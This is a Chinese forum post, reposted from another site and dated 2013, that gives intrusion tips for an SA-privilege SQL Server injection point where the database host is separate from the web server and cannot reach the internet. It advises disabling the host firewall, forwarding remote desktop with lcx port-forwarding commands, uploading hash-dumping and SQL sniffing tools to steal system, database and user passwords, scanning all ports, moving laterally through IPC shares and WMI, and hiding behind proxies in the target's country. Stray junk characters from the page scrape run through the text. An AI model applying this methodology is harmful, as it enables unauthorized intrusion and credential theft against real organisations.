当你碰到SA的注入点,可以执行命令,但是web与数据库分离,你都会怎么做呢,当数据库不服务器不能连接外网的时候,是不是只想着从web搞呢,这篇文章从t00ls转载过来,希望对大家sa权限的注入点数据库web分离提供一些渗透思路。3 p, s* C! o4 E+ b0 P3 {7 L
- a% ^* r* r% M9 @( g) R8 R+ ]
$ Z9 Y$ h4 e; w* V* B8 `( [. s N N/ s4 w
SA点,system权限,可执行命令,web和db分离.DB机器不上网(一般指中马不上线,lcx反弹不出)
# [1 _5 s! L9 ^" `
# v3 m& S, r @0 r. _. \$ N. T+ V/ k; \
一、DB机有公网IP.- r" n/ _, e: ]; H8 s
' D) ^2 ~* {% y! p; J, v3 p1:执行命令把系统防火墙和ip策略停止,netstat -an找到3389端口尝试连接.
1 q* ^: |% ~6 N) Y
) S8 |- r5 h- f8 Q1 z
" K/ J8 a6 g7 I% e* q! V2:从内往外扫描.把命令行下的s扫描器转成vbs传上DB机器生成exe扫描外网一台做了端口策略的机器.这台外网机器开放所有端口.(可以到网上找这 样的 机器.) 如果扫描结果有开放端口,证明在这台DB机可以把3389转到外面机器.比如扫到80 那就lcx -slave ip 80 127.0.0.1 3389. m/ U8 c( M2 q
( W4 J/ E4 P$ ~% E/ _# d6 A
5 e$ k& K' N( x5 ^6 }1 w, s! i3:尽量多拿密码.用vbs的方法上传gethash,sqlsniffer类的工具.拿到系统和mssql的密 码,数据库表的后台管理员密码,member表的最前几个用户密码.这些密码可以用来测试web后台,web的3389 ftp等.当然事先要对web机器完整扫描一遍. www.2cto.com
+ \% v) J$ X6 `7 K; _# {+ {& R) {0 q1 g. S
' v: z c* w- u5 _
4,nmap扫描.用nmap扫描web和db机器的1-65535端口.如果发现db机器显示有closed的端口.那恭喜你,你可以lcx -tran 把3389转发到该端口直接登陆.firewalk也有类似功能.但对代理防火墙无用.! K+ d& ?* q' J. j8 P/ V5 n5 |
# k& G0 g4 W, }2 H: x8 p! j
, {( n, ?: G# X. T' F- M
: {! ?8 O. C: w" f% T5 H! x) w
二、DB机只有内网IP! T1 `' }5 ]. P
) S9 V6 I5 \: b# `" O
1:尽量多拿密码来net use到web机器.这个过程需要极大的耐心 , 拿密码尝试登陆web后台等.9 L- U, W0 I4 q4 v3 d/ ?
( [% ?) {. d0 ^* z- l2 N( x
' `) v/ F$ p0 @. ?2:停掉防火墙和IP策略再从内往外扫描.! q" A& \3 M: I: X7 O1 ~# U
8 z3 ~% T( V+ N' P! c; B, _2 @( j" ]
3: ipconfig /dispalydns如果发现有公网的域名,极大可能是路由做了手脚.机会还是有的.
% f3 C, I/ {1 t& q# c
' m# ]% ^! |# x6 B
; x5 s, e) d6 m; c! S0 e4:学会密码规律分析往往会有惊喜.
1 I; L# ~4 u! y2 O- T7 j# u* u2 u: `
, [4 x0 o+ E/ D8 U5,在sa点里执行命令渗透内网,找可上网的机器.isql,ipc共享,wmi等* o T/ d7 T1 |5 d5 n0 f
+ V$ E$ @+ _& m0 h/ l" X
& `- P% @. \, g+ Y有些地区或国家会禁止别的国家连接一些端口,所以拥有目标国代理或VPN是很重要的 |
发表于 2013-2-16 21:46:01
收藏
支持
反对